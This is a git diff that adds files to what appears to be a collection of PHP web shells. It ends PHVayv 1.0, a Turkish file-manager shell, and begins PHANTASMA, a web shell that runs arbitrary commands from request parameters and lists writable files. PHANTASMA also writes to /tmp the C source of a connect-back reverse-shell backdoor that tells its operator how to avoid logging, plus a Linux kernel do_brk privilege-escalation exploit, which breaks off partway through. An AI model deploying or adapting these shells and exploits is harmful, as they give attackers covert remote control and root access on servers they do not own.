+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="1">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
+          <tr>
+            <td width="1" height="19"></td>
+            <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
+          </tr>
+          <tr>
+            <td width="1" height="1"></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F">
+    <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <br>
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+echo $okunan;
+} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    &nbsp;</td>
+  </tr>
+  </table>
+
+
+
+
+
+
+
+
+
+
+
+<?
+} else {
+?>
+
+
+
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>PHVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup�<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geli�tirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;�al���lan Klas�r</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
+                onmouseover='this.style.background="D9D9D9"'
+                onmouseout='this.style.background="9F9F9F"'
+                style="CURSOR: hand"
+                
+                
+                
+                
+                >
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+
+
+
+
+
+                <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
+                <font color="#000000">�st Klas�r</font></a></font></td>
+
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klas�r</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+  
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;T�r</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Ad�</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;��lem</font></td>
+  </tr>
+</table>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_dir("$dizin/$ekinci")){
+?>
+
+<? if ($ekinci=="." or  $ekinci=="..") {
+} else {
+?>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
+        <font color="#000000">A�</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+<?
+}
+?>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_file("$dizin/$ekinci")){
+
+?>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( XXX )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6"
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
+        <font color="#000000">D�zenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    </body></html><? } ?><? } ?><? } ?><? } ?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/PHANTASMA.php.txt b/xakep-shells/PHP/PHANTASMA.php.txt
new file mode 100644
index 0000000..59f92af
--- /dev/null
+++ b/xakep-shells/PHP/PHANTASMA.php.txt
@@ -0,0 +1,634 @@
+<CENTER>
+<DIV STYLE="font-family: verdana; font-size: 25px; font-weight: bold; color: #F3b700;">PHANTASMA- NeW CmD ;) </DIV>
+<BR>
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3b700;">Informa��o do sistema</DIV>
+<?php
+
+// 
+  closelog( );
+
+  $dono = get_current_user( );
+  $ver = phpversion( );
+  $login = posix_getuid( );
+  $euid = posix_geteuid( );
+  $gid = posix_getgid( );
+  if ($chdir == "") $chdir = getcwd( );
+
+?>
+<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
+<?php
+
+  $uname = posix_uname( );
+  while (list($info, $value) = each ($uname)) {
+
+?>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;"><?= $info ?>: <?= $value ?></DIV></TD>
+  </TR>
+<?php
+  }
+?>
+ 
+  <TR>
+   <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Script Current User: <?= $dono ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">PHP Version: <?= $ver ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">User Info: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Current Path: <?= $chdir ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Server IP: <?php $aaa =  gethostbyname($SERVER_NAME);  echo $aaa;?></DIV></TD>
+  </TR>
+   <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Web Server: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
+  </TR>
+</TABLE>
+<BR>
+<?php
+
+  if ($cmd != "") {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Command Mode Run</DIV>";
+
+?>
+
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Command Stdout</DIV>
+<?php
+
+if ($fe == 1){
+$fe = "exec";
+}
+if ($fe == ""){
+$fe = "passthru";
+}
+if ($fe == "2"){
+$fe = "system";
+}
+
+    if (isset($chdir)) @chdir($chdir);
+
+    ob_start( );
+      $fe("$cmd  2>&1");
+      $output = ob_get_contents();
+    ob_end_clean( );
+
+?>
+<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 12px;">
+<?php
+
+    if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
+?>
+</TEXTAREA>
+<BR>
+<?php
+
+  }
+ 
+  if ($safemode != "") {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Safemode Mode Run</DIV>";
+
+?>
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Safe Mode Directory Listing</DIV>
+<?php
+
+    if ($dir = @opendir($chdir)) {
+      echo "<TABLE border=1 cellspacing=1 cellpadding=0>";
+      echo "<TR>";
+      echo "<TD valign=top>";
+      echo "<b><font size=2 face=arial>List All Files</b> <br><br>";
+      while (($file = readdir($dir)) !== false) {
+        if (@is_file($file)) {
+          $file1 = fileowner($file);
+          $file2 = fileperms($file);
+    	  echo "<font color=green>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"; 
+	  // echo "<font color=green>$file1 - $file2 - $file </font><br>";
+          flush( );
+        }
+      }
+
+      echo "</TD>";
+      echo"<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Only Folders</b> <br><br>";
+      if ($dir = @opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_dir($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+	    echo "<font color=blue>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&chdir=$chdir/$file>$file</a><br>"; 
+            // echo "<font color=blue>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo"<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Writable Folders</b><br><br>";
+      if ($dir = @opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_writable($file) && @is_dir($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+            echo "<font color=red>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo "</TD>";
+      echo "<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Writable Files</b> <br><br>";
+ 
+      if ($dir = opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_writable($file) && @is_file($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+    	    echo "<font color=red>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo "</TR>";
+      echo "</TABLE>";
+    }
+  }
+
+?>
+<?php
+
+  if ($shell == "write") {
+    $shell = "#include <stdio.h>\n" .
+             "#include <sys/socket.h>\n" .
+             "#include <netinet/in.h>\n" .
+             "#include <arpa/inet.h>\n" .
+             "#include <netdb.h>\n" .
+             "int main(int argc, char **argv) {\n" .
+             "  char *host;\n" .
+             "  int port = 80;\n" .
+             "  int f;\n" .
+             "  int l;\n" .
+             "  int sock;\n" .
+             "  struct in_addr ia;\n" .
+             "  struct sockaddr_in sin, from;\n" .
+             "  struct hostent *he;\n" .
+             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
+             "                \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
+             "                \"For More Reliable Shell.\\n\"\n" .
+             "                \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
+             "                \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
+             "  printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
+             "  if (argc < 2 || argc > 3) {\n" .
+             "    printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Dumping Arguments\\n\");\n" .
+             "  l = strlen(argv[1]);\n" .
+             "  if (l <= 0) {\n" .
+             "    printf(\"[-] Invalid Host Name\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (!(host = (char *) malloc(l))) {\n" .
+             "    printf(\"[-] Unable to Allocate Memory\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  strncpy(host, argv[1], l);\n" .
+             "  if (argc == 3) {\n" .
+             "    port = atoi(argv[2]);\n" .
+             "    if (port <= 0 || port > 65535) {\n" .
+             "      printf(\"[-] Invalid Port Number\\n\");\n" .
+             "      return 1;\n" .
+             "    }\n" .
+             "  }\n" .
+             "  printf(\"[*] Resolving Host Name\\n\");\n" .
+             "  he = gethostbyname(host);\n" .
+             "  if (he) {\n" .
+             "    memcpy(&ia.s_addr, he->h_addr, 4);\n" .
+             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
+             "    printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  sin.sin_family = PF_INET;\n" .
+             "  sin.sin_addr.s_addr = ia.s_addr;\n" .
+             "  sin.sin_port = htons(port);\n" .
+             "  printf(\"[*] Connecting...\\n\");\n" .
+             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
+             "    printf(\"[-] Socket Error\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
+             "    printf(\"[-] Unable to Connect\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Spawning Shell\\n\");\n" .
+             "  f = fork( );\n" .
+             "  if (f < 0) {\n" .
+             "    printf(\"[-] Unable to Fork\\n\");\n" .
+             "    return 1;\n" .
+             "  } else if (!f) {\n" .
+             "    write(sock, msg, sizeof(msg));\n" .
+             "    dup2(sock, 0);\n" .
+             "    dup2(sock, 1);\n" .
+             "    dup2(sock, 2);\n" .
+             "    execl(\"/bin/sh\", \"shell\", NULL);\n" .
+             "    close(sock);\n" .
+             "    return 0;\n" .
+             "  }\n" .
+             "  printf(\"[*] Detached\\n\\n\");\n" .
+             "  return 0;\n" .
+             "}\n";
+
+    $fp = fopen("/tmp/dc-connectback.c", "w");
+    $ok = fwrite($fp, $shell);
+
+    if (!empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Connect Back Shell Was Successfuly Copied</DIV>";
+    } else {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Shell</DIV>";
+    }
+  }
+
+  if ($kernel == "write") {
+    $kernel = "/*\n" .
+              " * hatorihanzo.c\n" .
+              " * Linux kernel do_brk vma overflow exploit.\n" .
+              " *\n" .
+              " * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
+              " *\n" .
+              " * Further research and exploit development by\n" .
+              " * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
+              " *\n" .
+              " * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
+              " *\n" .
+              " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
+              " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
+              "*/\n" .
+              "#define _GNU_SOURCE\n" .
+              "#include <stdio.h>\n" .
+              "#include <stdlib.h>\n" .
+              "#include <errno.h>\n" .
+              "#include <string.h>\n" .
+              "#include <unistd.h>\n" .
+              "#include <fcntl.h>\n" .
+              "#include <signal.h>\n" .
+              "#include <paths.h>\n" .
+              "#include <grp.h>\n" .
+              "#include <setjmp.h>\n" .
+              "#include <stdint.h>\n" .
+              "#include <sys/mman.h>\n" .
+              "#include <sys/ipc.h>\n" .
+              "#include <sys/shm.h>\n" .
+              "#include <sys/ucontext.h>\n" .
+              "#include <sys/wait.h>\n" .
+              "#include <asm/ldt.h>\n" .
+              "#include <asm/page.h>\n" .
+              "#include <asm/segment.h>\n" .
+              "#include <linux/unistd.h>\n" .
+              "#include <linux/linkage.h>\n" .
+              "#define kB   * 1024\n" .
+              "#define MB   * 1024 kB\n" .
+              "#define GB   * 1024 MB\n" .
+              "#define MAGIC             0xdefaced /* I should've patented this number -cliph */\n" .
+              "#define ENTRY_MAGIC 0\n" .
+              "#define ENTRY_GATE 2\n" .
+              "#define ENTRY_CS    4\n" .
+              "#define ENTRY_DS    6\n" .
+              "#define CS          ((ENTRY_CS << 2) | 4)\n" .
+              "#define DS          ((ENTRY_DS << 2) | 4)\n" .
+              "#define GATE        ((ENTRY_GATE << 2) | 4 | 3)\n" .
+              "#define LDT_PAGES   ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)\n" .
+              "#define TOP_ADDR    0xFFFFE000U\n" .
+              "/* configuration */\n" .
+              "unsigned     task_size;\n" .
+              "unsigned     page;\n" .
+              "uid_t        uid;\n" .
+              "unsigned     address;\n" .
+              "int dontexit = 0;\n" .
+              "void fatal(char * msg)\n" .
+              "{\n" .
+              "      fprintf(stderr, \"[-] %s: %s\\n\", msg, strerror(errno));\n" .
+              "      if (dontexit) {\n" .
+              "             fprintf(stderr, \"[-] Unable to exit, entering neverending loop.\\n\");\n" .
+              "             kill(getpid(), SIGSTOP);\n" .
+              "             for (;;) pause();\n" .
+              "      }\n" .
+              "      exit(EXIT_FAILURE);\n" .
+              "}\n" .
+              "void configure(void)\n" .
+              "{\n" .
+              "      unsigned val;\n" .
+              "      task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;\n" .
+              "      uid = getuid();\n" .
+              "}\n" .
+              "void expand(void)\n" .
+              "{\n" .
+              "      unsigned top = (unsigned) sbrk(0);\n" .
+              "      unsigned limit = address + PAGE_SIZE;\n" .
+              "      do {\n" .
+              "             if (sbrk(PAGE_SIZE) == NULL)\n" .
+              "                   fatal(\"Kernel seems not to be vulnerable\");\n" .
+              "             dontexit = 1;\n" .
+              "             top += PAGE_SIZE;\n" .
+              "      } while (top < limit);\n" .
+              "}\n" .
+              "jmp_buf jmp;\n" .
+              "#define MAP_NOPAGE 1\n" .
+              "#define MAP_ISPAGE 2\n" .
+              "void sigsegv(int signo, siginfo_t * si, void * ptr)\n" .
+              "{\n" .
+              "      struct ucontext * uc = (struct ucontext *) ptr;\n" .
+              "      int error_code = uc->uc_mcontext.gregs[REG_ERR];\n" .
+              "      (void)signo;\n" .
+              "      (void)si;\n" .
+              "      error_code = MAP_NOPAGE + (error_code & 1);\n" .
+              "      longjmp(jmp, error_code);\n" .
+              "}\n" .
+              "void prepare(void)\n" .
+              "{\n" .
+              "      struct sigaction sa;\n" .
+              "      sa.sa_sigaction = sigsegv;\n" .
+              "      sa.sa_flags = SA_SIGINFO | SA_NOMASK;\n" .
+              "      sigemptyset(&sa.sa_mask);\n" .
+              "      sigaction(SIGSEGV, &sa, NULL);\n" .
+              "}\n" .
+              "int testaddr(unsigned addr)\n" .
+              "{\n" .
+              "      int val;\n" .
+              "      val = setjmp(jmp);\n" .
+              "      if (val == 0) {\n" .
+              "             asm (\"verr (%%eax)\" : : \"a\" (addr));\n" .
+              "             return MAP_ISPAGE;\n" .
+              "      }\n" .
+              "      return val;\n" .
+              "}\n" .
+              "#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)\n" .
+              "#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))\n" .
+              "#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)\n" .
+              "void map(unsigned * map)\n" .
+              "{\n" .
+              "      unsigned addr = task_size;\n" .
+              "      unsigned bit = 1;\n" .
+              "      prepare();\n" .
+              "      while (addr < TOP_ADDR) {\n" .
+              "             if (testaddr(addr) == MAP_ISPAGE)\n" .
+              "                   *map |= bit;\n" .
+              "             addr += PAGE_SIZE;\n" .
+              "             next(map, bit);\n" .
+              "      }\n" .
+              "      signal(SIGSEGV, SIG_DFL);\n" .
+              "}\n" .
+              "void find(unsigned * m)\n" .
+              "{\n" .
+              "      unsigned addr = task_size;\n" .
+              "      unsigned bit = 1;\n" .
+              "      unsigned count;\n" .
+              "      unsigned tmp;\n" .
+              "      prepare();\n" .
+              "      tmp = address = count = 0U;\n" .
+              "      while (addr < TOP_ADDR) {\n" .
+              "             int val = testaddr(addr);\n" .
+              "             if (val == MAP_ISPAGE && (*m & bit) == 0) {\n" .
+              "                   if (!tmp) tmp = addr;\n" .
+              "                   count++;\n" .
+              "             } else {\n" .
+              "                   if (tmp && count == LDT_PAGES) {\n" .
+              "                          errno = EAGAIN;\n" .
+              "                          if (address)\n" .
+              "                                fatal(\"double allocation\\n\");\n" .
+              "                          address = tmp;\n" .
+              "                   }\n" .
+              "                   tmp = count = 0U;\n" .
